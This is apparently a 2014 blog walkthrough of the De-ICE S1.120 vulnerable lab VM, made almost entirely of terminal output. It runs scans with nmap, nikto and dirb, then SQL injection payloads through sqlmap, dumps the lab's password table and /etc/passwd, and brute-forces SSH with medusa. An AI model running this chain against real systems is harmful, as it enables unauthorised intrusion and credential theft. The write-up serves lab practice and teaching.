2014. január 13., hétfő

De-ICE-S1.120-A

root@kali:~# netdiscover

 Currently scanning: 192.168.70.0/16   |   Screen View: Unique Hosts                                                     

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                           _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.1.120   08:00:27:df:b1:1d    01    060   CADMUS COMPUTER SYSTEMS                                                

 192.168.56.1    08:00:27:00:e0:df    01    060   CADMUS COMPUTER SYSTEMS                                                

 192.168.56.100  08:00:27:15:a3:c4    01    060   CADMUS COMPUTER SYSTEMS                                                

root@kali:~# unicornscan -mT 192.168.1.120
Main [Error   route.c:76] no route to host for `192.168.1.120/32'
Main exiting cant get interface(s) for target(s) from route table
root@kali:~# ifconfig eth0 192.168.1.121 netmask 255.255.255.0
root@kali:~# unicornscan -mT 192.168.1.120
TCP open                 ftp[   21]        from 192.168.1.120  ttl 64
TCP open                 ssh[   22]        from 192.168.1.120  ttl 64
TCP open                http[   80]        from 192.168.1.120  ttl 64
TCP open               https[  443]        from 192.168.1.120  ttl 64
TCP open               mysql[ 3306]        from 192.168.1.120  ttl 64
root@kali:~# nmap -sV -A 192.168.1.120 -pT:21,22,80,443,3306

Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-13 11:23 CET
Nmap scan report for 192.168.1.120
Host is up (0.00038s latency).
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD 1.3.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_dr-xr-xr-x   2 0        0              40 Jan  2  2011 incoming
22/tcp   open  ssh      OpenSSH 5.1 (protocol 2.0)
| ssh-hostkey: 1024 d5:92:37:32:f2:29:49:a1:3e:4f:cf:53:49:30:de:97 (DSA)
|_2048 6f:5a:87:f2:e9:b7:68:85:d7:b9:e5:e1:7f:92:c8:1e (RSA)
80/tcp   open  http     Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-

20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Primaline :: Quality Kitchen Accessories
443/tcp  open  ssl/http Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Primaline :: Quality Kitchen Accessories
| ssl-cert: Subject: commonName=localhost/organizationName=Apache Friends/stateOrProvinceName=Berlin/countryName=DE
| Not valid before: 2004-10-01T08:10:30+00:00
|_Not valid after:  2010-09-30T08:10:30+00:00
|_ssl-date: 2014-01-13T10:23:39+00:00; -1s from local time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_IDEA_128_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 08:00:27:DF:B1:1D (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.38 ms 192.168.1.120

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds

root@kali:~# nc 192.168.1.120 21
220 ProFTPD 1.3.2 Server (Primaline FTP Server) [192.168.1.120]
^C

root@kali:~# ssh root@192.168.1.120
The authenticity of host '192.168.1.120 (192.168.1.120)' can't be established.
RSA key fingerprint is 6f:5a:87:f2:e9:b7:68:85:d7:b9:e5:e1:7f:92:c8:1e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.120' (RSA) to the list of known hosts.
root@192.168.1.120's password:
Permission denied, please try again.
root@192.168.1.120's password:
Permission denied, please try again.
root@192.168.1.120's password:
Permission denied (publickey,password,keyboard-interactive).

root@kali:~# nikto -host 192.168.1.120
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.1.120
+ Target Hostname:    192.168.1.120
+ Target Port:        80
+ Start Time:         2014-01-13 11:27:44 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
+ Retrieved x-powered-by header: PHP/5.2.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 8428, size: 30894, mtime: 0x4303112ee9900
+ mod_apreq2-20051231/2.6.0 appears to be outdated (current is at least 2.6.1)
+ mod_perl/2.0.4 appears to be outdated (current is at least 2.0.7)
+ Apache/2.2.11 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ mod_ssl/2.2.11 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.2.9 appears to be outdated (current is at least 5.4.4)
+ Perl/v5.10.0 appears to be outdated (current is at least v5.14.2)
+ OpenSSL/0.9.8k appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ OSVDB-3268: /webalizer/: Directory indexing found.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.
+ OSVDB-3233: /cgi-bin/test-cgi: Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 22 item(s) reported on remote host
+ End Time:           2014-01-13 11:27:59 (GMT1) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@kali:~# cd /usr/share/dirb

root@kali:/usr/share/dirb# dirb http://192.168.1.120

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Mon Jan 13 11:28:36 2014
URL_BASE: http://192.168.1.120/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592                                                         

---- Scanning URL: http://192.168.1.120/ ----
+ http://192.168.1.120/cgi-bin/ (CODE:403|SIZE:1122)                                                                     

                                  
+ http://192.168.1.120/favicon.ico (CODE:200|SIZE:30894)                                                                 

                                  
+ http://192.168.1.120/index.php (CODE:200|SIZE:1325)                                                                    

                                  
==> DIRECTORY: http://192.168.1.120/phpmyadmin/                                                                          

                                  
==> DIRECTORY: http://192.168.1.120/webalizer/                                                                           

                                  
root@kali:/usr/share/dirb#
nikto -host 192.168.1.120 -port 443
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.1.120
+ Target Hostname:    192.168.1.120
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject: /C=DE/ST=Berlin/L=Berlin/O=Apache Friends/CN=localhost
                   Ciphers: DHE-RSA-AES256-SHA
                   Issuer:  /C=DE/ST=Berlin/L=Berlin/O=Apache Friends/CN=localhost
+ Start Time:         2014-01-13 11:32:18 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
+ Retrieved x-powered-by header: PHP/5.2.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ Hostname '192.168.1.120' does not match certificate's CN 'localhost'
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 8428, size: 30894, mtime: 0x4303112ee9900
+ mod_apreq2-20051231/2.6.0 appears to be outdated (current is at least 2.6.1)
+ mod_perl/2.0.4 appears to be outdated (current is at least 2.0.7)
+ Apache/2.2.11 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ mod_ssl/2.2.11 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.2.9 appears to be outdated (current is at least 5.4.4)
+ Perl/v5.10.0 appears to be outdated (current is at least v5.14.2)
+ OpenSSL/0.9.8k appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ OSVDB-3268: /webalizer/: Directory indexing found.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.
+ OSVDB-3233: /cgi-bin/test-cgi: Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 23 item(s) reported on remote host
+ End Time:           2014-01-13 11:34:35 (GMT1) (137 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@kali:/usr/share/dirb# dirb https://192.168.1.120

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Mon Jan 13 11:35:44 2014
URL_BASE: https://192.168.1.120/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592                                                         

---- Scanning URL: https://192.168.1.120/ ----
+ https://192.168.1.120/cgi-bin/ (CODE:403|SIZE:1122)                                                                    

                                  
+ https://192.168.1.120/favicon.ico (CODE:200|SIZE:30894)                                                                

                                  
+ https://192.168.1.120/index.php (CODE:200|SIZE:1325)                                                                   

                                  
==> DIRECTORY: https://192.168.1.120/phpmyadmin/                                                                         

                                  
==> DIRECTORY: https://192.168.1.120/webalizer/                                                                          

index.php

<p><a href=index.php>Home</a> <a href=add_product.php>Add Product</a> <a href=products.php>View Products</a></p>

add_product.php

<form action="insert_products.php" method="POST">

products.php
<form action="products.php" method="GET">

http://192.168.1.120/insert_products.php

product=prod&description=desc&price=1

--
root@kali:/usr/share/dirb# nc 192.168.1.120 3306
F�j Host '192.168.1.121' is not allowed to connect to this MySQL server

http://192.168.1.120/phpmyadmin/setup/

http://192.168.1.120/phpmyadmin/Documentation.htm

phpMyAdmin 3.1.3.1 Documentation

http://192.168.1.120/products.php?id=1

root@kali:~# sqlmap -u "http://192.168.1.120/products.php?id=1"

...
[12:03:02] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 37 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 8867=8867

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x71676e6871,0x4f5255754b6446647646,0x7176646171),NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[12:03:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.11, PHP 5.2.9
back-end DBMS: MySQL 5.0.11
[12:03:24] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/192.168.1.120'

[*] shutting down at 12:03:24

--dbs

[12:04:45] [INFO] fetching database names
available databases [6]:
[*] cdcol
[*] information_schema
[*] merch
[*] mysql
[*] phpmyadmin
[*] test

Database: cdcol
Table: cds
[3 entries]
+----+------+-----------------------------------+------------------+
| id | jahr | titel                             | interpret        |
+----+------+-----------------------------------+------------------+
| 1  | 1990 | Beauty                            | Ryuichi Sakamoto |
| 4  | 2001 | Goodbye Country (Hello Nightclub) | Groove Armada    |
| 5  | 1997 | Glee                              | Bran Van 3000    |
+----+------+-----------------------------------+------------------+

Database: mysql
Table: user
[50 entries]
+------------+------------------------------------------------------+
| User       | Password                                             |
+------------+------------------------------------------------------+
| aadams     | *90837F291B744BBE86DF95A37D2B2524185DBBF5 (whatever) |
| aallen     | *22AC3D548EB2C2A2F4E609ADA63251D0AF795AD9 (nintendo) |
| aard       | *4DC6D98E4CF6200B9F5529AFDE2E3B909F41E4D0 (kotaku)   |
| aharp      | *74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3 (passw0rd) |
| aheflin    | *2A032F7C5BA932872F0F045E0CF6B53CF702F2C5 (654321)   |
| amaynard   | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 (123456)   |
| aspears    | *A5892368AE83685440A1E27D012306B073BDF5B7 (monkey)   |
| aweiland   | *E56A114692FE0DE073F9A1DD68A00EEB9703F3F1 (123123)   |
| bbanter    | *CFBF459D9D6057BC2A85477A38327B96F06B1597 (iloveyou) |
| bphillips  | *D6B63C1953E7F096DB307F8AC48C4AD703E57001 (sunshine) |
| bwatkins   | *AE9F960F8FA0994C9878D2245DA640EAFF09BA0E (superman) |
| cchisholm  | *6A7A490FB9DC8C33C2B025A91737077A7E9CC5E5 (1234567)  |
| ccoffee    | *2CE4701D02A76C12CD513109CA16967A68B4C23A (princess) |
| dcooper    | *3B477BC23EA39BFF66D64BFB68DB5EC5F5E31C91 (consumer) |
| dgilfillan | *6691484EA6B50DDDE1926A220DA01FA9E575C18A (abc123)   |
| dgrant     | *7FD9F123C9FC025372A5AAD19D107783CD19CCF7 (cheese)   |
| djohnson   | *FD571203974BA9AFE270FE62151AE967ECA5E0AA (111111)   |
| dstevens   | *B021918A5DCA54916CF724573179571DFC37AC88 (jennifer) |
| dtraylor   | *24B8599BAF46DD4B4D8DB50A3B10136457492622 (starwars) |
| dwestling  | *446525BB82B5E22BD9E525261D37C494F623C52B (blahblah) |
| hlovell    | *DF216F57F1F2066124E1AA5491D995C3CB57E4C2 (welcome)  |
| jalcantar  | *44FFB04331ADAECB1FAB104F634E9B066BF8C6DC (pokemon)  |
| jalvarez   | *B2B366CA5C4697F31D4C55D61F0B17E70E5664EC (666666)   |
| jayala     | *DB1B792EC6DAE393BAE7AD832D3AF207C12E9A00 (michael)  |
| jbresnahan | *FBA7C2D27C9D05F3FD4C469A1BBAF557114E5594 (Password) |
| jdavenport | *61305383748FBEAB119F9A8BC35EBBADB4889A9D (babyl0n)  |
| jduff      | *46CFC7938B60837F46B610A2D10C248874555C14 (trustno1) |
| jfranklin  | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 (password) |
| kclemons   | *C5FEAC8A32D4FAFF1EF681447DA706634352AFF8 (killer)   |
| krenfro    | *D183105443FBDE597607B8BC5475A9E1B7847F3E (gizmodo)  |
| ktso       | *81101DED975D54BD76A3C8EAD293597AE9BB143F (computer) |
| kwebber    | *79BF466BCC601BD91A0897BB162421F9BA8C29CA (lifehack) |
| lmartinez  | *ED043A01F4583450BC8EB1E83C00C372CA49C4E4 (michelle) |
| lmorales   | *8D6A637F37955DBFCE1229204DDBED1CE11E6F41 (master)   |
| mbryan     | *626AC8265C7D53693CB7478376CE1B4825DFF286 (pepper)   |
| mholland   | *51AA306E66303073DBA15D2750E23C90C7A7F947 (baseball) |
| mnader     | *94F3DC3F398B76269CAAD51627279D4233A6C89A (soccer)   |
| mrodriguez | *A7D31514D37A55CE91C6C5DF97299CBC1B1937EC (jordan)   |
| myajima    | *00A51F3F48415C7D4E8908980D443C29C69B60C9 (12345)    |
| qpowers    | *84AAC12F54AB666ECFC2A83C676908C8BBC381B1 (12345678) |
| rdominguez | *3EEB06BE54EABF909DC8F6107110777F1DE43186 (gawker)   |
| rjacobson  | *797420C584EBF42750EB523104268BA0FD87FBC8 (internet) |
| rpatel     | *B12289EEF8752AD620294A64A37CD586223AB454 (0)        |
| sgains     | *F491287896471CB21030790BF46865C4A39DE651 (batman)   |
| sjohnson   | *FCAAF3F0BD94C027B2769A95903C355CE6294660 (football) |
| strammel   | *F8E113FD51D520075836A4B815568BA2B96F7C30 (dragon)   |
| swarren    | *7B2F14D9BB629E334CD49A1028BD85750F7D3530 (shadow)   |
| tdeleon    | *AA1420F182E88B9E5F874F6FBE7459291E8F4601 (qwerty)   |
| tgoodchap  | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein)  |
| webapp     | *0DCC22A95EEBFF4984DF6A7B7F2D7D28DBB5F36F            |
+------------+------------------------------------------------------+

root@kali:~# sqlmap -u "http://192.168.1.120/products.php?id=1" --file-read=/etc/passwd

root@kali:~# cat /usr/share/sqlmap/output/192.168.1.120/files/_etc_passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
qpowers:x:1000:100:Quinton Powers:/home/qpowers:
mbryan:x:1001:100:Michael Bryan:/home/mbryan:
dgrant:x:1002:100:Daniel Grant:/home/dgrant:
dgilfillan:x:1003:100:Darcy Gilfillan:/home/dgilfillan:
jbresnahan:x:1004:100:Jay Bresnahan:/home/jbresnahan:
aadams:x:1005:100:Adam Adams:/home/aadams:
aweiland:x:1006:100:Adam Weiland:/home/aweiland:
cchisholm:x:1007:100:Cindy Chisholm:/home/cchisholm:
jfranklin:x:1008:100:Johnny Franklin:/home/jfranklin:
hlovell:x:1009:100:Henrietta Lovell:/home/hlovell:
bphillips:x:1010:100:Brad Phillips:/home/bphillips:
myajima:x:1011:100:Moto Yajima:/home/myajima:
jalcantar:x:1012:100:Jesse Alcantar:/home/jalcantar:
jayala:x:1013:100:John Ayala:/home/jayala:
aard:x:1014:100:Aaron Ard:/home/aard:
aharp:x:1015:100:Annie Harp:/home/aharp:
lmorales:x:1016:100:Lindsey Morales:/home/lmorales:
kclemons:x:1017:100:Kathryn Clemons:/home/kclemons:
tgoodchap:x:1018:100:Taj Goodchap:/home/tgoodchap:
tdeleon:x:1019:100:Terrence Deleon:/home/tdeleon:
krenfro:x:1020:100:Kimberly Renfro:/home/krenfro:
bbanter:x:1021:100:Bob Banter:/home/bbanter:
aspears:x:1022:100:Adam Spears:/home/aspears:
djohnson:x:1023:100:Daniel Johnson:/home/djohnson:
aheflin:x:1024:100:Anna Heflin:/home/aheflin:
jdavenport:x:1025:100:James Davenport:/home/jdavenport:
sgains:x:1026:100:Susan Gains:/home/sgains:
swarren:x:1027:100:Samuel Warren:/home/swarren:
rdominguez:x:1028:100:Rafael Dominguez:/home/rdominguez:
ktso:x:1029:100:Kristen Tso:/home/ktso:
amaynard:x:1030:100:Arthur Maynard:/home/amaynard:
lmartinez:x:1031:100:Luis Martinez:/home/lmartinez:
dwestling:x:1032:100:David Westling:/home/dwestling:
dtraylor:x:1033:100:Donnie Traylor:/home/dtraylor:
jalvarez:x:1034:100:Joy Alvarez:/home/jalvarez:
mrodriguez:x:1035:100:Manuel Rodriguez:/home/mrodriguez:
rjacobson:x:1036:100:Randy Jacobson:/home/rjacobson:
dcooper:x:1037:100:Donald Cooper:/home/dcooper:
mholland:x:1038:100:Marian Holland:/home/mholland:
aallen:x:1039:100:Aaron Allen:/home/aallen:
ccoffee:x:1040:100:Chad Coffee:/home/ccoffee:
sjohnson:x:1041:100:Steven Johnson:/home/sjohnson:
bwatkins:x:1042:100:Brandon Watkins:/home/bwatkins:
kwebber:x:1043:100:Kathleen Webber:/home/kwebber:
rpatel:x:1044:100:Randall Patel:/home/rpatel:
jduff:x:1045:100:Jerry Duff:/home/jduff:
mnader:x:1046:100:Muhammad Nader:/home/mnader:
strammel:x:1047:100:Stephanie Trammel:/home/strammel:
dstevens:x:1048:100:Donald Stevens:/home/dstevens:

root@kali:~# pico  user_pass-txt
:aadams:whatever
:aallen:nintendo
:aard:kotaku
:aharp:passw0rd
:aheflin:654321
:amaynard:123456
:aspears:monkey
:aweiland:123123
:bbanter:iloveyou
:bphillips:sunshine
:bwatkins:superman
:cchisholm:1234567
:ccoffee:princess
:dcooper:consumer
:dgilfillan:abc123
:dgrant:cheese
:djohnson:111111
:dstevens:jennifer
:dtraylor:starwars
:dwestling:blahblah
:hlovell:welcome
:jalcantar:pokemon
:jalvarez:666666
:jayala:michael
:jbresnahan:Password
:jdavenport:babyl0n
:jduff:trustno1
:jfranklin:password
:kclemons:killer
:krenfro:gizmodo
:ktso:computer
:kwebber:lifehack
:lmartinez:michelle
:lmorales:master
:mbryan:pepper
:mholland:baseball
:mnader:soccer
:mrodriguez:jordan
:myajima:12345
:qpowers:12345678
:rdominguez:gawker
:rjacobson:internet
:rpatel:0
:sgains:batman
:sjohnson:football
:strammel:dragon
:swarren:shadow
:tdeleon:qwerty
:tgoodchap:letmein

root@kali:~# medusa -h 192.168.1.120 -C user_pass-txt -M ssh -v 6
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

GENERAL: Parallel Hosts: 1 Parallel Logins: 1
GENERAL: Total Hosts: 1
GENERAL: Total Users: [combo]
GENERAL: Total Passwords: [combo]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aadams (1 of 49, 0 complete) Password: whatever (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aadams Password: whatever [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aallen (2 of 49, 1 complete) Password: nintendo (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aallen Password: nintendo [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aard (3 of 49, 2 complete) Password: kotaku (1 of 1

complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aard Password: kotaku [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aharp (4 of 49, 3 complete) Password: passw0rd (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aharp Password: passw0rd [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aheflin (5 of 49, 4 complete) Password: 654321 (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aheflin Password: 654321 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: amaynard (6 of 49, 5 complete) Password: 123456 (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: amaynard Password: 123456 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aspears (7 of 49, 6 complete) Password: monkey (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aspears Password: monkey [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aweiland (8 of 49, 7 complete) Password: 123123 (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aweiland Password: 123123 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: bbanter (9 of 49, 8 complete) Password: iloveyou (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: bbanter Password: iloveyou [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: bphillips (10 of 49, 9 complete) Password: sunshine

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: bphillips Password: sunshine [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: bwatkins (11 of 49, 10 complete) Password: superman

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: bwatkins Password: superman [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: cchisholm (12 of 49, 11 complete) Password: 1234567

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: cchisholm Password: 1234567 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: ccoffee (13 of 49, 12 complete) Password: princess (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: ccoffee Password: princess [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dcooper (14 of 49, 13 complete) Password: consumer (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dcooper Password: consumer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dgilfillan (15 of 49, 14 complete) Password: abc123

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dgilfillan Password: abc123 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dgrant (16 of 49, 15 complete) Password: cheese (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dgrant Password: cheese [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: djohnson (17 of 49, 16 complete) Password: 111111 (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: djohnson Password: 111111 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dstevens (18 of 49, 17 complete) Password: jennifer

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dstevens Password: jennifer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dtraylor (19 of 49, 18 complete) Password: starwars

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dtraylor Password: starwars [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dwestling (20 of 49, 19 complete) Password: blahblah

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dwestling Password: blahblah [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: hlovell (21 of 49, 20 complete) Password: welcome (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: hlovell Password: welcome [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jalcantar (22 of 49, 21 complete) Password: pokemon

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jalcantar Password: pokemon [SUCCESS]
